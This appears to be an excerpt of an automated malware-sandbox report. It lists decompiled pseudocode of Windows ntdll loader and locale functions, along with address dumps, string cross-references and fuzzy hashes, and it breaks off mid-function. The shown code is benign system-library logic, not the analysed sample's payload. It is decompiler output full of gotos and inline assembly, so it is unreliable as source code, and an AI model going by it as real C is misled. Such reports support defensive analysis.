0x012a826c
0x012a8280
0x012a8282
0x012a8282
0x012a8289
0x012a8290
0x012a8293
0x012a8294
0x012a8298
0x012a829b
0x012a829b
0x01253e35
0x01253e38
0x01253e3d
0x01253e44
0x01253e58
0x012a82a3
0x012a82a3
0x01253e58
0x01253e60
0x01253e6f
0x01253e74
0x01253e77
0x01253e77
0x01253e7a
0x01253e7f
0x01253e8c
0x01253e8c
0x01253e91
0x00000000
0x01253e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01253E97
WindowsExcludedProcs, xrefs: 01253D6F
Kernel-MUI-Language-Allowed, xrefs: 01253DC0
Kernel-MUI-Number-Allowed, xrefs: 01253D8C
Kernel-MUI-Language-SKU, xrefs: 01253F70

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: d31917ce99394d3738ff1aac614bbe1fdf6cbe37e300de426bc76a2e7c85108a
Instruction ID: f4b94d432edd73fcb8fccb9bd566c4e8f21178404e948c19b5a39ca15426b87d
Opcode Fuzzy Hash: d31917ce99394d3738ff1aac614bbe1fdf6cbe37e300de426bc76a2e7c85108a
Instruction Fuzzy Hash: CBF15172D2025AEFCF15EF98C980AEEBBB9FF18750F14005AE905A7250E7749E41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01258794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01258794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0125934A() != 0) {
								_t159 = E012CA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1335780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E012C5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1335780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0125849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01258999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01258999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1335c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1335c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01262280(_t92, 0x13386cc);
															_t94 = E01319DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1335c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01258A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1335c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1335c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0128F380(_t136, 0x1221184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01262280(_t108, 0x13386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01319D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0125FFB0(_t118, _t156, 0x13386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01289A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01258799
0x0125879d
0x012587a1
0x012587a3
0x012587a8
0x012587c3
0x012587c3
0x012587c8
0x012587d1
0x012587d4
0x012587d8
0x012587e5
0x012587ec
0x012a9bfe
0x012a9c00
0x012a9c02
0x012a9c08
0x012a9c0d
0x012a9c0f
0x012a9c14
0x012a9c2d
0x012a9c32
0x012a9c37
0x012a9c3a
0x012a9c3c
0x012a9c42
0x012a9c42
0x012a9c3c
0x012a9c02
0x012587da
0x012587df
0x012587e3
0x00000000
0x00000000
0x012587e3
0x012587f2
0x00000000
0x012587fb
0x012587fd
0x012587fe
0x0125880e
0x0125880f
0x01258810
0x01258814
0x0125881a
0x0125881c
0x0125881f
0x01258821
0x01258822
0x01258824
0x01258826
0x0125882c
0x0125882e
0x012a9c48
0x012a9c48
0x01258834
0x01258834
0x01258837
0x00000000
0x00000000
0x01258837
0x0125882e
0x0125883d
0x01258840
0x01258843
0x01258846
0x01258849
0x0125884c
0x0125884e
0x01258850
0x01258852
0x01258854
0x01258857
0x012588b4
0x012588b6
0x012588b6
0x01258859
0x01258859
0x01258859
0x01258861
0x01258866
0x0125886a
0x0125893d
0x01258941
0x00000000
0x01258947
0x01258947
0x0125894a
0x0125894c
0x00000000
0x01258952
0x01258955
0x0125895a
0x0125895d
0x0125895d
0x0125895f
0x01258961
0x01258961
0x01258968
0x00000000
0x00000000
0x0125896a
0x0125896b
0x0125896e
0x00000000
0x01258970
0x01258970
0x01258970
0x01258970
0x01258972
0x01258972
0x01258974
0x00000000
0x0125897a
0x0125897a
0x0125897d
0x00000000
0x01258983
0x012a9c65
0x012a9c6d
0x012a9c72
0x012a9c75
0x012a9c75
0x012a9c82
0x012a9c86
0x012a9c87
0x012a9c88
0x012a9c89
0x012a9c8c
0x012a9c90
0x012a9c95
0x012a9c97
0x012a9ca0
0x012a9ca3
0x012a9ca9
0x012a9ca9
0x00000000
0x012a9ca9
0x012a9ca3
0x00000000
0x012a9c97
0x0125897d
0x00000000
0x01258974
0x01258988
0x01258992
0x01258996
0x00000000
0x01258996
0x0125894c
0x00000000
0x01258870
0x0125887b
0x0125887d
0x0125887f
0x01258881
0x01258884
0x01258884
0x01258886
0x01258889
0x0125888c
0x0125888e
0x01258891
0x01258891
0x01258898
0x00000000
0x00000000
0x0125889a
0x0125889b
0x0125889e
0x00000000
0x00000000
0x012588a0
0x012588a8
0x012588b0
0x012588b2
0x012588d3
0x012588d5
0x00000000
0x012588d7
0x012588db
0x012588dc
0x012588e0
0x012588e8
0x012588ee
0x012588f0
0x012588f3
0x012588fc
0x01258901
0x01258906
0x0125890c
0x0125890c
0x0125890f
0x01258916
0x01258917
0x01258918
0x01258919
0x0125891a
0x0125891f
0x01258921
0x012a9c52
0x012a9c55
0x012a9c5b
0x012a9cac
0x012a9cc0
0x012a9cc0
0x012a9c55
0x01258927
0x01258927
0x0125892f
0x01258933
0x00000000
0x012588f5
0x012588f5
0x00000000
0x012588f7
0x012588f7
0x012588fa
0x00000000
0x00000000
0x00000000
0x00000000
0x012588fa
0x012588f5
0x012588f3
0x00000000
0x012588d5
0x00000000
0x012588b2
0x012588c9
0x00000000
0x012588c9
0x0125887f
0x0125886a
0x01258857
0x01258852
0x012588bf
0x012588bf
0x012587aa
0x012587ad
0x012587ae
0x012587b4
0x012587b5
0x012587b6
0x012587b8
0x012587bd
0x012587c1
0x012587f4
0x012587fa
0x00000000
0x00000000
0x00000000
0x012587c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 012A9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 012A9C18
LdrpDoPostSnapWork, xrefs: 012A9C1E

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 383a808bf92ab9d33ca59c458380fc1ea5d1c52e79675da2e3e0c6f20fa7b2f2
Instruction ID: b52fd3a664dbf502fd5bd0d780d3aa87decfcfa224280201e7defc60f1242611
Opcode Fuzzy Hash: 383a808bf92ab9d33ca59c458380fc1ea5d1c52e79675da2e3e0c6f20fa7b2f2
Instruction Fuzzy Hash: FD910231A2021BEBEF98DF5AD4C5ABAB7B5FF44314F444169DE01AB240E7B0E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01257E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01257E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0125CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0124C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1335780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E012C5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1335780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01267D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01267D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E012C7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01267D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01267D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E012C7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0127A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0124B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01257e4c
0x01257e50
0x01257e55
0x01257e58
0x01257e5d
0x01257e71
0x01257f33
0x01257e77
0x01257e77
0x01257e79
0x01257e79
0x01257e7e
0x01257f45
0x012a9848
0x00000000
0x012a9848
0x01257f4e
0x01257f53
0x01257f5a
0x00000000
0x00000000
0x012a985a
0x012a9862
0x012a9866
0x00000000
0x012a986c
0x00000000
0x012a986c
0x01257e84
0x01257e84
0x01257e8d
0x012a9871
0x01257eb8
0x01257ec0
0x01257ec0
0x01257e9a
0x012a987e
0x00000000
0x00000000
0x012a9884
0x012a988b
0x012a98a7
0x012a98ac
0x012a98b1
0x012a98b6
0x012a98b8
0x012a98b8
0x012a98b9
0x00000000
0x012a98b9
0x01257ea0
0x01257ea7
0x00000000
0x00000000
0x01257eac
0x01257eb1
0x01257ec6
0x01257ed0
0x012a98cc
0x01257ed6
0x01257ed6
0x01257ed6
0x01257ede
0x01257ee3
0x012a98e3
0x012a98f0
0x012a9902
0x012a98f2
0x012a98fb
0x012a98fb
0x012a9907
0x012a991d
0x012a991d
0x012a9907
0x012a98e3
0x01257ef0
0x01257f14
0x01257f14
0x01257f1e
0x012a9946
0x01257f24
0x01257f24
0x01257f24
0x01257f2c
0x012a996a
0x012a9975
0x012a9975
0x012a997e
0x012a9993
0x012a9993
0x012a997e
0x00000000
0x01257ef2
0x01257efc
0x01257f0a
0x01257f0e
0x012a9933
0x00000000
0x012a9933
0x00000000
0x01257f0e
0x00000000
0x00000000
0x00000000
0x01257eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 012A98A2
LdrpCompleteMapModule, xrefs: 012A9898
Could not validate the crypto signature for DLL %wZ, xrefs: 012A9891

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 4565b596ae3f73aee7f892919c381092e064538d84b53503f30ee3a30058aa06
Instruction ID: 0670b8d5fee2a02d7d041853a016cd6a4ff6924131e08895886d5fd03eb27ab3
Opcode Fuzzy Hash: 4565b596ae3f73aee7f892919c381092e064538d84b53503f30ee3a30058aa06
Instruction Fuzzy Hash: 80510031670742DFEB22CB6DC984B2A7BE4AB00718F8406A9EE519B3D1D774ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0124E620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0124E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0124F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012895D0();
						}
						if(_t78 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0128FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0128BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01289600();
					if(_t97 < 0) {
						goto L6;
					}
					E0128BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0124F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0128BB40(_t83, _t102 + 0x24, _t78);
								if(L012543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0128BB40(_t84, _t102 + 0x24, _t94);
									if(L012543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0124e620
0x0124e628
0x0124e62f
0x0124e631
0x0124e635
0x0124e637
0x0124e63e
0x012a5503
0x012a5503
0x0124e64c
0x0124e64c
0x0124e651
0x00000000
0x00000000
0x0124e661
0x0124e665
0x012a542a
0x0124e715
0x0124e71a
0x0124e71c
0x0124e720
0x0124e720
0x0124e727
0x0124e736
0x0124e736
0x0124e743
0x0124e743
0x0124e673
0x0124e678
0x0124e67d
0x0124e682
0x0124e685
0x0124e692
0x0124e69b
0x0124e6a3
0x0124e6ad
0x0124e6b1
0x0124e6b2
0x0124e6bb
0x0124e6bf
0x0124e6c0
0x0124e6c8
0x0124e6cc
0x0124e6d5
0x0124e6d9
0x00000000
0x00000000
0x0124e6e5
0x0124e6ea
0x0124e6f9
0x0124e70b
0x0124e70f
0x012a5439
0x012a545e
0x012a545e
0x00000000
0x012a545e
0x012a543b
0x012a543e
0x012a5440
0x012a5445
0x012a5472
0x012a5475
0x012a548d
0x012a5493
0x012a54a9
0x00000000
0x00000000
0x012a54ab
0x012a54b4
0x012a54bc
0x012a54c8
0x012a54de
0x012a54fb
0x012a54e0
0x012a54e6
0x012a54eb
0x012a54eb
0x012a54de
0x00000000
0x012a54bc
0x012a5477
0x012a547a
0x012a5480
0x012a5483
0x012a5486
0x012a548b
0x00000000
0x00000000
0x00000000
0x012a548b
0x00000000
0x00000000
0x00000000
0x00000000
0x012a5447
0x012a5447
0x012a5447
0x012a5447
0x012a544e
0x00000000
0x00000000
0x012a5450
0x012a5452
0x012a5455
0x012a545a
0x00000000
0x00000000
0x00000000
0x012a545c
0x012a546a
0x012a546d
0x012a546f
0x00000000
0x012a546f
0x0124e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0124E68C
InstallLanguageFallback, xrefs: 0124E6DB
@, xrefs: 0124E6C0

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: fb19574ae9f83a4d8898aea070ffaa5f8507bf82dbe407690174948aaf42314a
Instruction ID: b987effc0eb4808235e4ab86a75bf70aa2ee94da4ea8ec9bd061c34b524f1636
Opcode Fuzzy Hash: fb19574ae9f83a4d8898aea070ffaa5f8507bf82dbe407690174948aaf42314a
Instruction Fuzzy Hash: 9A51BD726293469BD719EF28C440A7BB7E8FF88714F45092EFA85D7250F734DA0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 012DFF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 012DFF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 012DFF60

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: e8375731c023041f58cd0df95ba5150a176427c055898cf3fe3ea5fcd24ca234
Instruction ID: e55172d17fa21f23953cf357333bf34c4c35dfa670b59e7c4c1e7d8e2c1cd835
Opcode Fuzzy Hash: e8375731c023041f58cd0df95ba5150a176427c055898cf3fe3ea5fcd24ca234
Instruction Fuzzy Hash: CB110471930149EFDF26DF54CA49FA8BBB1FF04704F148084E205572A1C7389940DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0130E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0130E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0130BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
